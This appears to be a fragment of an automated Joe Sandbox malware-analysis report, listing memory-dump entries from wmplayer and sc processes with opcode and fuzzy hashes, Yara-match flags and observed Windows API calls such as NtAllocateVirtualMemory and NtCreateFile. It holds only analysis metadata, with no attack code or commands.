                                              • Opcode Fuzzy Hash: 43106fb4deecc0f6b104bff2a908478990c49e6a11be3f7442e475f803c428f3
                                              • Instruction Fuzzy Hash: B790023521545C42D140B15C4445A46041587D0305F56C011A0064A94D9B258E55B661
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 251712ae17a6457c9862de028a21209a2fb7cd76e226b2a0f0aa1d7c42d43543
                                              • Instruction ID: 9113934d7dd8c5f05c31c48faffd56eb4cd66fc403a2d7ca4e17ff1281241abd
                                              • Opcode Fuzzy Hash: 251712ae17a6457c9862de028a21209a2fb7cd76e226b2a0f0aa1d7c42d43543
                                              • Instruction Fuzzy Hash: 8C9002B5211554924500F25C8445B0A490587E0201B56C016E1054960CCA2589519135
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5f6762b73babdfc88b8280ccc1605248b2b690458ce670918c9d8490975a875
                                              • Instruction ID: 9f98ed4b504059c3288bbea596833bb278b4fcae58219c454ac8f3a64a5dffb2
                                              • Opcode Fuzzy Hash: b5f6762b73babdfc88b8280ccc1605248b2b690458ce670918c9d8490975a875
                                              • Instruction Fuzzy Hash: 56900239231414020145F55C064550B084597D6351396C015F1416990CCB2189655321
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b2ad22898d3269c36e9885ec470fbf2361d049ac1016c0722a947a9187feafb
                                              • Instruction ID: 86913322b0ad6cf8d20ddf84fdd9d06fb646f606b614f87249da00a7c597b5f9
                                              • Opcode Fuzzy Hash: 6b2ad22898d3269c36e9885ec470fbf2361d049ac1016c0722a947a9187feafb
                                              • Instruction Fuzzy Hash: 4390043D331414030105F55C07455070447C7D5351357C031F1015D50CDF31CD715131
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60ec4028395ac0af52e1c247c1f60d60d8c059a54ddc35ca7b78252e2a349173
                                              • Instruction ID: 43ba17a77a73e7cd553d400d87890cf4c874ebee9e660a1c8efc821d77b060da
                                              • Opcode Fuzzy Hash: 60ec4028395ac0af52e1c247c1f60d60d8c059a54ddc35ca7b78252e2a349173
                                              • Instruction Fuzzy Hash: 4790023525546502D150B15C44456164405A7E0201F56C021A0814994D8A5589556221
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 221655de1f09acba118c3efc902179301a41cf06bd7a56ba05dcf71ef7350d76
                                              • Instruction ID: eb6cdf516bef35e4d12f0c370fab0d95f5bbebb96d439e3b7b1b39fd47ef1986
                                              • Opcode Fuzzy Hash: 221655de1f09acba118c3efc902179301a41cf06bd7a56ba05dcf71ef7350d76
                                              • Instruction Fuzzy Hash: 5290027535141842D100B15C4455B060405C7E1301F56C015E1064954D8B19CD526126
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20a1d734fa15551254753200badd04dff0b3e622f3372edb0a98ce962397d213
                                              • Instruction ID: 212d52731fae866f04771dbac88758b33e816cd91bfc23418c42e00c1a8c0939
                                              • Opcode Fuzzy Hash: 20a1d734fa15551254753200badd04dff0b3e622f3372edb0a98ce962397d213
                                              • Instruction Fuzzy Hash: 1B90027522141442D104B15C4445706044587E1201F56C012A2154954CCA298D615125
                                              Memory Dump Source
                                              • Instruction ID: 50c3e07082910edb150c77470a3b041204d8f13524b0b20c99dc8e4f48eea3f3
                                              • Opcode Fuzzy Hash: d3b1dcfb0845bb5b11f96647d55c60c058c7c8a1c4d2cd154e00ac40a5f663ef
                                              • Instruction Fuzzy Hash: D0811A75D102699BDB21DB54CC45BEEB7B8AF09710F0485EAE919B7280D7709EC4CFA0
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0335CFBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID: @$@4Cw@4Cw
                                              • API String ID: 4062629308-3101775584
                                              • Opcode ID: c2db6ab95820b7ecaf7f80e84a835d62561564b93a6521bb1c31df576f9d21b7
                                              • Instruction ID: 53e10fe1e8fe85e20ac5d93e32196583b570d8a4e9b5c54afbf7c74f1c9e4bb6
                                              • Opcode Fuzzy Hash: c2db6ab95820b7ecaf7f80e84a835d62561564b93a6521bb1c31df576f9d21b7
                                              • Instruction Fuzzy Hash: 44419DBA910314DFCB21DF94C880AADBBB8EF44710F04452AF915DB254D778D841CB60

                                              Execution Graph

                                              Execution Coverage:3%
                                              Dynamic/Decrypted Code Coverage:4%
                                              Signature Coverage:1.4%
                                              Total number of Nodes:496
                                              Total number of Limit Nodes:75

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ^$ ;{x+$ B$!:$$$$P$*N$+d$:($<C$AF$G$ID$I`$Pv$Xq$bI$fL$pj$t($zZ${:$+$F$H
                                              • API String ID: 0-2496873784
                                              • Opcode ID: 2991be7da0ba87dc2dda644dfd9ddd3e654dec9d71ef1ed8c54f2c04673343da
                                              • Instruction ID: 2cdba7c4f3ebdd6e480e3eeacde979b6d6e3a01a22c2ce84ef40dd3e1ef89a88
                                              • Opcode Fuzzy Hash: 2991be7da0ba87dc2dda644dfd9ddd3e654dec9d71ef1ed8c54f2c04673343da
                                              • Instruction Fuzzy Hash: 1632CCB0D45229CBEB24CF45C9987EDBBB2BB45308F1091D9D1496B282C7B91ECACF45
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E1BD84
                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02E1BDBF
                                              • FindClose.KERNELBASE(?), ref: 02E1BDCA
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: d2e3bf0895aad5277f26f29573e5470a2d773fe159bae29d1b260fb7a208acda
                                              • Instruction ID: 67f89ac10f540ee609eb16e91dc45e96829ba315ed0baa7375d5df3d9e1c5c4b
                                              • Opcode Fuzzy Hash: d2e3bf0895aad5277f26f29573e5470a2d773fe159bae29d1b260fb7a208acda
                                              • Instruction Fuzzy Hash: 31319271940248BBDB24DF60CC85FEF777D9F44709F14956CF909AB180EB70AA848BA0
                                              APIs
                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02E27C63
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 84d4dad2c4c3b1cef6bd09c59e1f8330804c3018dc16b04c2698d04254ef2634
                                              • Instruction ID: 13cdeac053b0c5704e911ec0331a5a6bb9ba1d5c0b0244d4638d42fd828172c0
                                              • Opcode Fuzzy Hash: 84d4dad2c4c3b1cef6bd09c59e1f8330804c3018dc16b04c2698d04254ef2634
                                              • Instruction Fuzzy Hash: 6631D2B5A40649AFCB14DF98D880EDEB7F9EF8C310F109219F919A7340D730A9528FA5
                                              APIs
                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02E27DA8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 80dc1390ca48c5d0f25600eaeef4ad0bea618cfa619d8ab256df1233b53076ad
                                              • Instruction ID: da2ccee0c05406dc685649730425c863b9a87dd965d1310c0bc9ad8141920049
                                              • Opcode Fuzzy Hash: 80dc1390ca48c5d0f25600eaeef4ad0bea618cfa619d8ab256df1233b53076ad
                                              • Instruction Fuzzy Hash: 1431E4B5A40209AFCB14DF99D880EEFB7B9EF88314F108219FD19A7240D770A8518FA5
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(02E117FE,?,02E26C17,00000000,00000004,00003000,?,?,?,?,?,02E26C17,02E117FE,02E117FE,00000000,?), ref: 02E2804D
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 5568dea4c8ca8698226094edc2721bef8e4aa1d4a805e2a82088953719428c6f
                                              • Instruction ID: 1317629060660874a2d34035816c1fafa872c12e33ad29d0190435fb292be681
                                              • Opcode Fuzzy Hash: 5568dea4c8ca8698226094edc2721bef8e4aa1d4a805e2a82088953719428c6f
                                              • Instruction Fuzzy Hash: 9A2119B1A40219AFDB14DF58DC81FAFB7AAEF88310F108109FD0997240D774A9558FA5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 4731d91a9ffcf5b7c1b94e2298f6f222d1c5d89d00eb63a1b6857847cc9146f5
                                              • Instruction ID: cf4a9523aaf28eff2b24d64a226f5115ae01ca639c3b92c4e7996aa010aa3d57
                                              • Opcode Fuzzy Hash: 4731d91a9ffcf5b7c1b94e2298f6f222d1c5d89d00eb63a1b6857847cc9146f5
                                              • Instruction Fuzzy Hash: 3F01D671A802147FD620EBA4DC41FEB77ADDF95310F409509FA09AB180D7B079158BF6
                                              APIs
                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E27E77
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction ID: e87c516452b793c77127674f4909dbcceb4a05c3de55165e34ab30723ccd7676
                                              • Opcode Fuzzy Hash: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction Fuzzy Hash: 64E086326802147BC250EB59DC41FDB776DDFC5750F518015FA0DAB141C67079058BF5
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 12c643422bfda1c469c4bc16a3cd8cd2e264ff3ecced52f5a1ed144b17abd920
                                              • Instruction ID: 15f54689a1a1f97bc5e425fe4e977db412489573f063ce1aece79b7193a9ceb4
                                              • Opcode Fuzzy Hash: 12c643422bfda1c469c4bc16a3cd8cd2e264ff3ecced52f5a1ed144b17abd920
                                              • Instruction Fuzzy Hash: CD900231715844169140B1995C845464045A7E0315B59C015E4424555C8B158A565361
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6a3d84575efd8eef4e040e1cc2ab24518ee3d0691589309735614eed575cf629
                                              • Instruction ID: c094eb64a70837c019e0f8e09c225d5f98dda8e873aad99c67e95855db6c3f5b
                                              • Opcode Fuzzy Hash: 6a3d84575efd8eef4e040e1cc2ab24518ee3d0691589309735614eed575cf629
                                              • Instruction Fuzzy Hash: 5990022135144C06D140B19998147070046D7D0615F59C015A4024555D87178A6566B1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ba811bde92358a880f2126f4e07b348a25d6d9661e9bc284900803261d479f33
                                              • Instruction ID: 2622393e066393462f9e06e929c9ed2af511349ad5cbf400df05482ba7d7c178
                                              • Opcode Fuzzy Hash: ba811bde92358a880f2126f4e07b348a25d6d9661e9bc284900803261d479f33
                                              • Instruction Fuzzy Hash: 3F900261711544464140B1995C044066045A7E1315399C119A4554561C871989559269
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fd7b478141cff144c59803082c66cec624639262393db393aa6f3d8e381914f3
                                              • Instruction ID: 3c189578d3a62392f983ff4bad9fbc30336bc0195558d054c6585f42f871b460
                                              • Opcode Fuzzy Hash: fd7b478141cff144c59803082c66cec624639262393db393aa6f3d8e381914f3
                                              • Instruction Fuzzy Hash: 8990023171554806D100B1995914706104597D0215F69C415A4424569D87968A5165A2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 133880a2fb727971d9f6f4e7b1d5ac36d24dc460e39be51918d0c481ab60eba6
                                              • Instruction ID: d0266a2a967eb804d730d2657169686374ad54084872fcd5d7388edefaab5ca3
                                              • Opcode Fuzzy Hash: 133880a2fb727971d9f6f4e7b1d5ac36d24dc460e39be51918d0c481ab60eba6
                                              • Instruction Fuzzy Hash: 4F900261312444074105B1995814616404A97E0215B59C025E5014591DC62689916125
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: db7bc184cc1835393111f662719f9162669552a8983d69b15c0f5ff7c4725f74
                                              • Instruction ID: 4e1f79c8787e05ea289872fd2d983c67c2d7a7c8fe3a1676dea51098c64a9554
                                              • Opcode Fuzzy Hash: db7bc184cc1835393111f662719f9162669552a8983d69b15c0f5ff7c4725f74
                                              • Instruction Fuzzy Hash: 0990023131144C06D180B199580464A004597D1315F99C019A4025655DCB168B5977A1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8b3c0e21360da4cd5ca80926a4a5c4d6bdc87ee7d1ae1c16eb697ae2a6dcd08e
                                              • Instruction ID: b6d54a57a2ac7dc6362a4cff55aebe87581a8d538acf78cccf15ee38107ce2a1
                                              • Opcode Fuzzy Hash: 8b3c0e21360da4cd5ca80926a4a5c4d6bdc87ee7d1ae1c16eb697ae2a6dcd08e
                                              • Instruction Fuzzy Hash: 4A90023131548C46D140B1995804A46005597D0319F59C015A4064695D97268E55B661
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4d4ecf44dacc8bbdca95ddc7b5340a863e8065e4d874a86f638e9d6ce3335588
                                              • Instruction ID: aabaeadc0ac12af8e6d3885538f4b0d647876799c81edcb117e4d4bf253ec4c9
                                              • Opcode Fuzzy Hash: 4d4ecf44dacc8bbdca95ddc7b5340a863e8065e4d874a86f638e9d6ce3335588
                                              • Instruction Fuzzy Hash: C590023171544C06D150B1995814746004597D0315F59C015A4024655D87568B5576A1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2236917389ca3b39e1b4a13b946dd92618df8ba5d4f36325a98ff20a61a3d26f
                                              • Instruction ID: 76c22db9f4ceae7cc22ab6ee25b17f9799ef9fc74f807b000f9e71a5bfca2a55
                                              • Opcode Fuzzy Hash: 2236917389ca3b39e1b4a13b946dd92618df8ba5d4f36325a98ff20a61a3d26f
                                              • Instruction Fuzzy Hash: BE900225321444070105F5991B04507008697D5365359C025F5015551CD72289615121
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e8a4870511d82742496e6e728d798f25eb85bbe4c985f46ab21875db9a925f42
                                              • Instruction ID: eb63ddb6008592e0cc09009a312768eae4b301fdb5b3434dc892828a3dd51957
                                              • Opcode Fuzzy Hash: e8a4870511d82742496e6e728d798f25eb85bbe4c985f46ab21875db9a925f42
                                              • Instruction Fuzzy Hash: FC900225331444060145F5991A0450B0485A7D6365399C019F5416591CC72289655321
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 305e06793d4c284b1aeb1460517276ab88116852329acfcf278a216cfae0240a
                                              • Instruction ID: f10490e609118dcaca8f4d41019c8cc962d8961048d07ea52ac362e51e9c3d12
                                              • Opcode Fuzzy Hash: 305e06793d4c284b1aeb1460517276ab88116852329acfcf278a216cfae0240a
                                              • Instruction Fuzzy Hash: 9390022135549506D150B19D58046164045B7E0215F59C025A4814595D865689556221
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 42bcbb02cfcca2850270701403a03c2f38aa6cb8b154a2f382d3202afb989624
                                              • Instruction ID: 745d6171044ee3393dc3e6f1424dc12b30e743d64a32cc2b64554a34697b8780
                                              • Opcode Fuzzy Hash: 42bcbb02cfcca2850270701403a03c2f38aa6cb8b154a2f382d3202afb989624
                                              • Instruction Fuzzy Hash: C790026135144846D100B1995814B060045D7E1315F59C019E5064555D871ACD526126
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c68482fb09967a46feb1de65c1a8b151daedcc036ec32a0f8482562554b9e551
                                              • Instruction ID: a88433b67f8417e34f04ab38ae5d4b18fca0eea50dbb2be8eaed76a9c0e8468c
                                              • Opcode Fuzzy Hash: c68482fb09967a46feb1de65c1a8b151daedcc036ec32a0f8482562554b9e551
                                              • Instruction Fuzzy Hash: 7E900221321C4446D200B5A95C14B07004597D0317F59C119A4154555CCA1689615521
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b699595d3cf8bfb0f0788df1e49363320c26eae8feb3fdf69c9b1a33ae2e5e81
                                              • Instruction ID: d4beb81d6bd19ed07f1e8e4a6191bd5addb4ae08c68490509803559b9ddd2112
                                              • Opcode Fuzzy Hash: b699595d3cf8bfb0f0788df1e49363320c26eae8feb3fdf69c9b1a33ae2e5e81
                                              • Instruction Fuzzy Hash: A1900221711444464140B1A99C449064045BBE1225759C125A4998551D865A89655665
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
